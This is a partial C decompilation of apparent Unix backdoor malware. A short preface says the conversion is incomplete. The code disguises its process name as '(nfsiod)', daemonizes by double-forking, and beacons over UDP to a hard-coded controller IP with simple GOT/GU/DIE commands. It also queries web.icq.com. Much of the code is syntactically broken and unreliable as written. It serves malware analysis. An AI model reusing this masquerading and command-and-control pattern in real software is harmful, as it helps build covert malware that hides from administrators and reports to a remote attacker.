This represents an incomplete conversion of the disassembled code to C code. Some of the smaller functions will be accurate and complete, at least in equivalence of effect - some of the larger functions are hardly complete at all.
int main (int argc, char *argv[]) { char buf[30000]; memset(buf, '\0', 30000); memset(argv[0], '\0', strlen(argv[0])); strcpy("(nfsiod)", argv[0]); signal(SIGCHLD, SIG_IGN); if (fork()) { exit(0); } signal(SIGCHLD, SIG_IGN); seteuid(1); if (fork()) { exit(0); } signal(SIGPIPE, SIG_IGN); chdir("/"); signal(SIGCHLD, SIG_IGN); while(1) { func6( , buf, 30000); func7( , buf, 30000); sleep(1); } } int get_ip_num (char* address) { int inet_num; struct hostent *host; inet_num = inet_addr(address); if (inet_num == -1) { host = gethostbyname(address); if (!host) { exit(0); } bcopy(host->h_addr_list[0], &inet_num, 4); } return inet_num; } int open_udp (void){ int sockid; if (!sockid = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) { exit(0); } else { fcntl(sockid, F_SETFL, O_NONBLOCK); } return sockid; } int close_socket (int sockid) { return close(sockid); } void send_msg_home (int sockid, char *msg, int msglen) { struct sockaddr_in tosock; if (sockid != NULL) { tosock.sin_family = AF_INET; tosock.sin_addr = get_ip_num("216.242.103.2"); tosock.sin_port = htons("53413"); if (sendto(sockid, msg, msglen, 0, (struct sockaddr *) &tosock, 16) < 0) { exit(0); } } } int get_msg_from_home(int sockid, char *buf, int buflen) { int result= 0; socklen_t socklength; struct sockaddr fromsock; bzero(buf, 16); fromsock.sa_family = AF_INET; fromsock.sa_data = get_ip_num("216.242.103.2"); if (recvfrom(sockid, buf, buflen, 0, fromsock, &socklength) >= 0) { result = 1; } return result; } void func6 ( , char* buf, int buflen) { int sockid; do { sockid = open_udp(); length = strlen(buf); if (length >= 3) { send_msg_home(sockid, buf, length); sleep(10); if (!recv_msg_from_home(sockid, buf, buflen)) ... exit(0); } if (!strncmp(buf, "GOT", 3) { } else { send_msg_home(sockid, "GU\n", 3); sleep(10); recv_msg_from_home (sockid, buf, 1000); if (strncmp(buf, "DIE", 3) { close_socket(sockid); exit(0); } } } else { } } while ( != 0); } void func7 ( , char* buf, int buflen) { int sockid; unsigned short net_addr; sockid = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); net_addr = htons(get_ip_num("web.icq.com")); if (connect(sockid, net_addr, 16) == -1) { close(sockid); } else { sleep(1); fcntl(sockid, F_SETFL, O_NONBLOCK); } sprintf(buf, "GET /wwp?Uin=%lu HTTP/1.0\nHost: web.icq.com\n\n", num); send(sockid, buf, strlen(buf), 0); /* timeout code ? */ sockid = func8(sockid); while (read(sockid, &ch, 1)==1) { } } int func8 (int sockid) { if (ioctl(sockid, 0x541b, ) == -1) { return -1; } else { return sockid; } }